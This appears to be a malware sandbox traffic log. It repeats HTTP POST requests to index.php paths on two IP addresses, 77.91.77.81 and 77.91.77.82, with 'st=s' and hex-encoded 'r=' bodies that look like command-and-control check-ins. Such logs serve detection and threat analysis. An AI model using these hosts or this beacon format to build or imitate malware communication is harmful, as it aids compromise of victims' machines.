                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 41 42 31 45 39 44 32 37 35 41 46 38 38 31 42 43 46 37 35 34 35 46 46 43 39 45 35 42 37 30 41 39 43 30 31 44 45 32 30 41 44 45 32 42 38 43 41 39 46 30 45 44 37 34 41 41 46 46 41 44 45 32 34 35 37 38 42 34 42 35 36 34 37 41 32 38 38 45 37 46 38 31 30 30 38 44 41 39 36 41 45 36 43 38 46 38 41 33 34 33 43 44 46 45 46 44 33 33 43 32 30 39 42 44 42 31 30 30 31 36 34 44 37 31 32 45 44 35 42 30 34 43 33 45 38 37 44 43 46 34 31 43 33 31 39 39 31 46 35 31 35 36 36 35 33 35 46 30 Data Ascii: r=AB1E9D275AF881BCF7545FFC9E5B70A9C01DE20ADE2B8CA9F0ED74AAFFADE24578B4B5647A288E7F81008DA96AE6C8F8A343CDFEFD33C209BDB100164D712ED5B04C3E87DCF41C31991F51566535F0
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Kiru9gu/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.81Content-Length: 4Cache-Control: no-cacheData Raw: 73 74 3d 73 Data Ascii: st=s
                          Source: global trafficHTTP traffic detected: POST /Hun4Ko/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: 77.91.77.82Content-Length: 160Cache-Control: no-cacheData Raw: 72 3d 42 34 38 33 33 32 35 38 39 37 43 43 45 37 44 45 30 38 34 35 41 45 43 31 34 44 36 36 33 35 30 35 33 44 41 37 30 37 42 35 38 42 38 31 42 34 45 46 41 38 45 30 43 46 37 42 43 31 31 38 34 38 42 31 34 30 42 45 31 44 34 36 34 35 30 46 43 39 44 44 46 36 34 32 45 33 42 44 44 37 30 41 37 39 42 32 32 41 37 35 42 37 35 43 38 32 44 31 32 46 43 37 36 31 42 41 33 42 42 33 36 35 46 46 35 37 34 33 33 31 45 34 32 38 36 37 37 39 42 41 45 34 35 33 39 37 34 32 39 39 43 30 42 45 35 35 42 34 Data Ascii: r=B483325897CCE7DE0845AEC14D6635053DA707B58B81B4EFA8E0CF7BC11848B140BE1D46450FC9DDF642E3BDD70A79B22A75B75C82D12FC761BA3BB365FF574331E4286779BAE453974299C0BE55B4
